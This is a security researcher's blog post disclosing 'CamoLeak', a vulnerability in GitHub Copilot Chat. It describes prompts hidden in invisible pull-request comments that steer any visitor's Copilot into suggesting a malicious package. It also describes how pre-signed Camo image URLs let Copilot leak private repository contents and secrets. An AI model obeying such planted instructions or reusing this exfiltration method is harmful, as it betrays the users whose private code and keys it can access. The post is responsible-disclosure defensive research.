https://www.legitsecurity.com/blog/camoleak-critical-github-copilot-vulnerability-leaks-private-source-code
Watch the Recording of our Webinar: AI-Generated Code and the Next
Era of Secure Development
Logo
* ASPM Platform
ASPM Platform
Overview
Legit is an AI-native ASPM platform that automates AppSec issue
discovery, prioritization, and remediation. A trusted ASPM vendor
for your AppSec and software supply chain security programs.
Learn More
Integrations
Use Cases:
hub
Unified Vulnerability Remediation
code-scanning
Code Security (SAST, SCA)
encrypted
Secrets Detection & Prevention
account_tree
Software Supply Chain Security
settings_applications
Advanced Code Change Management
Platform - ASPM Icon
Compliance
* AI-Native AppSec
* Resources
Resources - Blog Icon
Blog
Resources - Resource Library Icon
Resource Library
Resources - Open Source with Legitify Icon
Open Source with Legitify
Resources - Events Icon
Events
Company - About Legit Icon 2
ASPM Knowledge Base
* Company
Company - About Legit Icon 2
About Legit
Why Legit - Customers Icon
Customers
Company - Partners Icon
Partners
Company - Press Releases Icon 1
Press Releases
Company - In the News Icon
In the News
Company - Careers Icon
Careers
contact_us_new
Contact Us
Book a Demo
ASPM Platform
ASPM Platform
Overview
Legit is an AI-native ASPM platform that automates AppSec issue
discovery, prioritization, and remediation. A trusted ASPM vendor for
your AppSec and software supply chain security programs.
Learn More
Integrations
Use Cases:
hub
Unified Vulnerability Remediation
code-scanning
Code Security (SAST, SCA)
encrypted
Secrets Detection & Prevention
account_tree
Software Supply Chain Security
settings_applications
Advanced Code Change Management
Platform - ASPM Icon
Compliance
AI-Native AppSec
header mobile nav icon
AI-Native AppSec
Resources
Resources - Blog Icon
Blog
Resources - Resource Library Icon
Resource Library
Resources - Open Source with Legitify Icon
Open Source with Legitify
Resources - Events Icon
Events
Company - About Legit Icon 2
ASPM Knowledge Base
Company
Company - About Legit Icon 2
About Legit
Why Legit - Customers Icon
Customers
Company - Partners Icon
Partners
Company - Press Releases Icon 1
Press Releases
Company - In the News Icon
In the News
Company - Careers Icon
Careers
contact_us_new
Contact Us
Request a Demo
Sign In
*
* Blog
* CamoLeak: Critical GitHub Copilot Vulnerability Leaks Private
Source Code
Blog
CamoLeak: Critical GitHub Copilot Vulnerability Leaks Private Source
Code
Omer Mayraz Written by Omer Mayraz
Published on
October 08, 2025
Updated on
October 08, 2025
In this article
[]
Sign up for our newsletter
SHARE:
Get details on our discovery of a critical vulnerability in GitHub
Copilot Chat.
TL;DR:
In June 2025, I found a critical vulnerability in GitHub Copilot Chat
(CVSS 9.6) that allowed silent exfiltration of secrets and source
code from private repos, and gave me full control over Copilot's
responses, including suggesting malicious code or links.
The attack combined a novel CSP bypass using GitHub's own
infrastructure with remote prompt injection. I reported it via
HackerOne, and GitHub fixed it by disabling image rendering in
Copilot Chat completely.
Background
GitHub Copilot Chat is an AI assistant built into GitHub that helps
developers by answering questions, explaining code, and suggesting
implementations directly in their workflow.
Copilot Chat is context-aware: it can use information from the
repository (such as code, commits, or pull requests) to provide
tailored answers.
As always, more context = more attack surface.
rick
Finding the prompt injection
As mentioned earlier, GitHub Copilot is context-aware - so I set out
to make it notice me. To do this, I embedded a prompt directed at
Copilot inside a pull request description.
Screenshot 2025-09-30 at 3.21.24 PM
hooray
But what's the point if everyone can see it? Luckily, GitHub came to
the rescue with a proper solution: invisible comments are an official
feature!
You can find more details in their documentation: Hiding content with
comments. By simply putting the content you want to hide inside:
Screenshot 2025-09-30 at 3.25.10 PM
I tried the same prompt but this time as a hidden comment inside the
PR description, and it worked!
hidden_comment
Interestingly, posting a hidden comment triggers the usual PR
notification to the repo owner, but the content of the hidden comment
isn't revealed anywhere.
Screenshot 2025-09-30 at 3.30.38 PM
I attempted logging in with a different user and visited the pull
request page. The prompt was injected into my context as well!
I then replaced the original "HOORAY" prompt with far more complex
instructions, including code suggestions and Markdown rendering, and
to my surprise, they worked flawlessly!
For instance, notice how effortlessly Copilot suggests this
malicious Copilotevil package.
Screenshot 2025-09-23 at 11.24.04 AM
test4
* Notice that the user who asked Copilot Chat to explain the PR is
different from the user who posted the invisible prompt,
demonstrating that the prompt can affect any user who visits the
page.
Copilot operates with the same permissions as the user making the
request, but it obviously needs access to the user's private
repositories to respond accurately. We can exploit this by including
instructions in our injected prompt to access a victim user's private
repository, encode its contents in base16, and append it to a URL.
Then, when the user clicks the URL, the data is exfiltrated back to
us.
Screenshot 2025-09-23 at 11.28.07 AM
* Notice that the repository https://github.com/LegitSecurity/
issues-service is a private repo inside a private GitHub
organization!
link
Recap: What We Can Do
* Influence the responses generated by another user's Copilot
* Inject custom Markdown, including URLs, code, and images
* Exploit the fact that Copilot runs with the same permissions as
the victim user
Bypassing Content Security Policy (CSP)
This is where things get tricky. If you've followed along so far,
you're probably thinking -- just inject an HTML
tag into the
victim's chat, encode their private data as a parameter, and once the
browser tries to render it, the data will be leaked.
Not so fast. GitHub enforces a very restrictive Content Security
Policy (CSP), which blocks fetching images and other content types
from domains that aren't explicitly owned by GitHub. So, our
"simple"
trick won't work out of the box.
You're probably asking yourself - wait, how does my fancy README
manage to show images from third-party sites?
When you commit a README or any Markdown file containing external
images, GitHub automatically processes the file, during this process:
1. GitHub parses the Markdown and identifies any image URLs pointing
to domains outside of GitHub.
2. URL rewriting via Camo: Each external URL is rewritten to a Camo
proxy URL. This URL includes a HMAC-based cryptographic signature
and points to https://camo.githubusercontent.com/....
3. Signed request verification: When a browser requests the image,
the Camo proxy verifies the signature to ensure it was generated
by GitHub. Only valid, signed URLs are allowed.
4. Content fetching: If the signature is valid, Camo fetches the
external image from its original location and serves it through
GitHub's servers.
This process ensures that:
* Attackers cannot craft arbitrary URLs to exfiltrate dynamic data.
* All external images go through a controlled proxy, maintaining
security and integrity.
* The end user sees the image seamlessly in the README, but the
underlying URL never exposes the original domain directly.
More information about Camo can be found here.
Let's look at an example: Committing a README file to GitHub that
contains this URL:
Screenshot 2025-09-30 at 3.54.19 PM
Will be automatically changed inside the README into:
Screenshot 2025-09-30 at 4.09.07 PM
Rather than doing it manually through the website, you can use
GitHub's REST API to submit raw Markdown and receive it back with all
external image URLs automatically converted to Camo proxy URLs.
generating_camo
Alright, so we can't generate Camo URLs on the fly -- without code
execution, every
tag we inject into the victim's chat must
include a valid Camo URL signature that was pre-generated. Otherwise,
GitHub's reverse proxy won't fetch the content.
The discovery
I spent a long time thinking about this problem before this crazy
idea struck me.
If I create a dictionary of all letters and symbols in the alphabet,
pre-generate their corresponding Camo URLs, embed this dictionary
into the injected prompt, and then ask Copilot to play a "small game"
by rendering the content I want to leak as "ASCII art" composed
entirely of images, will Copilot inject valid Camo images that the
browser will render by their order? Yes, it will.
I quickly got to work. First, I set up a web server that responds to
every request with a 1x1 transparent pixel. This way, when GitHub's
Camo reverse proxy fetches the images from my server, they remain
invisible in the victim's chat.
Screenshot 2025-09-30 at 4.15.42 PM
Next, by using GitHub's API, I created a valid Camo URL dictionary of
all the letters and symbols that may be used to leak source code /
issues content:
Screenshot 2025-09-30 at 4.17.46 PM
Turns into:
Screenshot 2025-09-30 at 4.19.12 PM
And finally, I created the prompt:
Screenshot 2025-09-23 at 12.13.17 PM
* I added "random" parameter at the end of each Camo URL and
requested Copilot to generate each time a new random number and
append it to the URL, this way caching is not a problem.
Our target: the description of a zero-day vulnerability inside an
issue of a private project.
zero_day
The result: Stealing zero days from private repositories.
PoC showcasing the full attack (Only if you have 4 minutes):
I also managed to get Copilot to search the victim's entire codebase
for the keyword "AWS_KEY" and exfiltrate the result.
GitHub's Response
GitHub reports that the vulnerability was fixed as of August 14.
Screenshot 2025-09-01 at 18.21.47
To learn more
Get details on a previous vulnerability we unearthed in GitLab Duo.
Get our thoughts on AppSec in the age of AI.
Blog
Related posts
See more
ASPM Knowledge Base
A Foundation You Can Trust
Get a stronger AppSec foundation you can trust and prove it's doing
the job right.
Request a Demo
Platform
Unified Vulnerability Remediation Code Scanning (SAST, SCA) Secrets
Detection & Prevention Software Supply Chain Security Advanced Code
Change Management Compliance
Customers
Customers
Company
Partners About Us Careers News Events Contact Us
Resources
Blog Resource Library Open Source
Compare
OX Security ArmorCode Apiiro Cycode
Learn
ASPM Knowledge Base SDLC Security DevOps Security GitHub Security
Secure Software Supply Chain Application Security Posture Management
legit-footer-logo
Privacy Policy Terms of Use (c) 2025 Legit Security